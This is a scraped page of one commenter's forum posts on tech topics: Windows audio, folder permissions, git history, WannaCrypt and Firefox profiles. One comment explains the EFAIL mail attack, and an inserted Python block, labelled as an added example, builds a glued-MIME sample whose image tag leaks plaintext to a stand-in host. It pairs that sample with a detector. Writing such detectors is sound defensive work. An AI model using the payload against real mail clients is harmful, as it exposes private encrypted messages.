dude you just burned through this site's yearly allowance of capitals and quote marks for the year, wtf
1188 posts • joined 1 May 2008
Your mates vape. Your boss quit smoking. You promised to quit in 2019. But how will Big Tobacco give it up?
OpenStack 2018: Mark Shuttleworth chats to The Reg about 10-year support plans, Linus Torvalds and Russian rockets
To my mind, however, Microsoft hit a high point for event audio with Windows 95. Subsequent releases of Windows have never reached such glorious levels of gratuitous audio; indeed, the startup and shutdown sounds these days are little more than clicks or bips.
How dare you overlook that Vista's "soundscapes" were imagineered by bleedin' Robert Fripp?
People gonna forget how rock'n'roll MICROS~1 used to be ;)
Re: Not a good look here.
If you're on a multi-user machine, ensuring "your" stuff is insulated by the correct file permissions by default is valuable: I tried making a "personal" folder under C:\ (which last I looked is world-writeable by default - WTF?!) but ensuring the permissions were set to propagate properly was a screaming nightmare. Windows permissions editing ... shudder.
I stopped using [user]\Documents when ransomware became a thing, as this would likely be a default target. The weird symlinking shenanigans to which Documents and its ilk are subject make them problematic for doing backups as well.
As for AppData, I've never grokked the philosophical distinction between Local/LocalLow/Roaming, and it's pretty clear app devs don't either. I never know which one I'll find an app's settings in, let alone why. Some even use more than one of them(?)
At least the FOSS apps can be relied upon to ignore all of them and create a nice predictable [user]\.[appname] folder :)
Linux kernel's Torvalds: 'I am truly sorry' for my 'unprofessional' rants, I need a break to get help
Re: I blame the source code management...
As I recall, the main target of Linus's anger at the time was Andrew Tridgell, for coming out with the reverse-engineered BK client that provoked BK's owner to withdraw the free-beer client license for kernel devs. If git was named for any one person at that time it was probably Tridge.
However, the very swift appearance of git in the wake of BK's move did make me wonder whether Linus had already been working towards dumping BK for some time, having tacitly acknowledged the complaints from many around him about the risks of adopting it in the first place.
Re: For fucks sake
Nah. All the downvotes in the world don't tell the poster that throwing around homophobic slurs (thanks for the repro, @TonyJ) is not OK with the Reg. For a lot of such specimens it only emboldens them. Nuking their post (with presumably a ban-warning given behind the scenes) tells them they're in a place that won't stand for that shit.
to the unhappy days of early-Noughties wifi adapter purchasing for Linux, where not just white-box jobs but most big brands were prone to having their innards completely re-jigged without so much as a telltale hardware rev to warn buyers of its now paperweight status. Traumatic.
@James Hughes 1 if you're still hanging around, is there any way to identify the faulty boards? Are any steps being taken to withdraw them from sales channels? (I don't remember seeing anything about this in the article, although that was a good 5 minutes ago now #NanaMoon)
Someone (possibly here yesterday) explained it thus: The attacker sends a crafted message with three MIME parts to it:
Part 1 (HTML)
Part 2 (PGP / S/MIME)
[Previously-intercepted encrypted message]
Part 2 (HTML)
The silly mail client then glues all three into a single HTML part for display, and if it's REALLY silly it also goes right ahead and fetches the image, which passes the plaintext to $badguyserver in the URL (or as many characters thereof as the system allows for a URL string).
Hope I have that right; for some reason I'm loath to grace the vanity vuln-site with a click.
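The gluing behaviour described in the comment above can be caught on the receiving side by checking each HTML part on its own before display. The following Python check is an added example, not part of the original comment: the function names, the `.invalid` host and the placeholder ciphertext are constructed for illustration, and the scanner is a heuristic that does not understand HTML comments or scripts.

```python
from email import message_from_string

# Constructed sample: three MIME parts in the shape the comment describes.
# The host is a reserved .invalid name; the ciphertext is a placeholder.
SAMPLE = """\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.invalid/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--B
Content-Type: text/html

">
--B--
"""

def ends_unterminated(html):
    """True if the fragment ends inside a tag or a quoted attribute value."""
    in_tag, quote = False, None
    for ch in html:
        if quote:                      # inside "..." or '...': wait for the match
            if ch == quote:
                quote = None
        elif in_tag:
            if ch in "\"'":
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    return in_tag or quote is not None

def suspicious_parts(raw):
    """Indexes of text/html leaf parts that leave markup open before a later part."""
    leaves = [p for p in message_from_string(raw).walk() if not p.is_multipart()]
    hits = []
    for i, part in enumerate(leaves[:-1]):   # the last part has nothing after it
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            if ends_unterminated(body):
                hits.append(i)
    return hits
```

A client that renders every MIME part as its own isolated document never lets markup left open in one part reach the next; a non-empty result here is a reason to refuse decryption or remote-content loading for that message.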
Re: "Upgrading users should be able to ignore the viewer as before."
My phone's data connection goes through the cabinet as well? Damn. I should try to get them to route mine through the cabinet near my mum's place, I always get better speeds there.
And if the problem's in the cabinet, how much help is the Windows manual going to be?
PCI DSS and POS card terminals
At the moment (as far as I understand it) there is a sizeable difference in the compliance burden for PCI DSS between credit-card terminals that connect via dialup vs over the internet. To wit, terminal on dialup = can just self-certify; terminal over IP = have to get whole network audited regularly.
Doesn't moving to VoIP mean then that every bugger'll have to get audits done? Or will the exemption apply to it as well? Penny-pinching minds demand to know.
Re: "Nobody uses it..."
>A pox on it. We need IPv7 - just add another octet at the start of IPv6..
Couldn't we add one onto IPv4 instead and keep the rest of it the same? Then the hard-won skills of a multitude of consumer grannies (and me) could be transferred and nobody has to play how-many-colons bingo with that ridiculously opaque address scheme. Worked pretty well when we needed more phone numbers, amirite?
Re: On air compression
Wanted to mention you can also add ReplayGain tags (both track and album) to FLAC files, the command-line app "metaflac" can do it. My player supports it, but YMMV.
The loudness issue used to drive me mad on my phone, but after much study I managed to patch the old Android (ICS) Music app to support ReplayGain on MP3s.
Only problem was when Jelly Bean came along and I recompiled the app, it now has "gapless playback" (i.e. a slight crossfade/segue) which when fading from a song with lots of gain applied to one with none or negative gain, there tends to be a split-second burst of EXTREME LOUDNESS until the equalizer adjusts it to where it should be for the next track. I must try to fix this at some point but I fear by then the AOSP app will be abandonware :(
Re: Boobytrap a VM.
Mm, I wondered the same. Not sure the CMD shell can even do that on the host VM all that easily, let alone reaching back through the tubes and doing it to the VNC client's host machine.
Not to mention that if Hide Extensions is enabled (as has been default for quite some time), the mark might wonder why the file *has* a .TXT extension showing?
Now you could name it "Passwords.bat" but the icon would still be wrong. Worth a try would be creating the batchfile elsewhere and placing on the Desktop a shortcut to it, which IIRC you can change the icon of the shortcut.
But I'd still like that recipe for how this batchfile is pwning the intruder's machine. Still with us, OP?
Icon: closest available to "chinny reckon".
Re: ISP reports...
(in a couple of cases I even got a "recipient does not exist" response)
Now that *should* be enough to see action taken by their (the ISP's) TLD registry, as it violates RFCs, but I imagine for most of them this is equally fruitless.
What you can do however is report the offending IP (and in some cases the ISP's whole IP range if there is enough evidence of endemic misuse) to various spam blacklists (there are many). Then at least you're hopefully reducing the pain for others.
74 countries hit by NSA-powered WannaCrypt ransomware backdoor: Emergency fixes emitted by Microsoft for WinXP+
What the I don't even
I'm reading through the Cisco analysis as I speak, but I'm not yet seeing what's the excuse for being vulnerable to this.
Seems that it
(1) Spreads through unsecured SMB ports
Well what the fuck retard has their MSNet ports out there waving in the breeze of the general Internet in this day and age, FFS? I mean even MS don't sell you an OS any more that does such stupid things OOTB.
(2) Drops a binary, msseseccexxxesexypoo.exe (or something)...
Well how does it drop it and execute it without a by-your-leave? What browser/email client is allowing that to happen, because it doesn't magically happen without a parent vuln or colossally bad design decision to enable it.
I've only skimmed this info so far but please, someone, let me know if I can get this without having my SMB ports open to the WAN and/or ignoring some permutation of Windows/browser/emailer that won't shout at me "UR ABOUT TO RUN A PROGGY OFF TEH INTERNET IT MITE BE BAD ACTULY ITS PROLLY BAD Y/N" prior to executing a downloaded binary (which, Christ, Windows itself actually does a pretty good job of doing lately).
Most of the time Firefox binary release is fine, at times I've used that in preference to whichever distro's package, and that meant getting updates straight away too. I wish LibreOffice had a standalone installer as it's a nightmare trying to satisfy dependencies for Gentoo's binary package of it. I might give the Snap/Flatpak option a look.
Firefox accounts do use end-to-end encryption, so your 2nd and 3rd "rules" are moot. And if the data "being on someone else's computer" still bothers you that much in spite of this, the server software is all open-source so you can host it on your own computer if you want.*
* I did this myself and have to admit it is quite a battle to set it all up correctly, so in the end I asked myself why I was bothering and got a Firefox account instead. #NoRegrets
Re: Need more variety, not less
Some impressively over-engineered solutions above, but this can be accomplished using Firefox alone. I use this feature myself to insulate extra-sensitive workloads from day-to-day omnivorous browsing. Just start Firefox's profile manager:
Create a new profile called e.g. 'banking'. When done, launch not this new profile but your original one (called 'default' by, er, default).
Now, without closing Firefox, execute this:
firefox -no-remote -p banking
Voilà: a completely separate instance of Firefox running side-by-side with, but fully insulated from, your normal browsing. And because it's completely separate, you can customise the browser UI, add-ons and other preferences completely independently, to optimise them for the one or few sites you'll use it for.
This. I don't think they appreciate quite how big a kick in the market-share nuts the upcoming bonfire of the legacy add-ons is going to be. The current add-on ecosystem is the only thing besides sentimentality and inertia that's keeping me on board (though I certainly don't much fancy the alternatives either).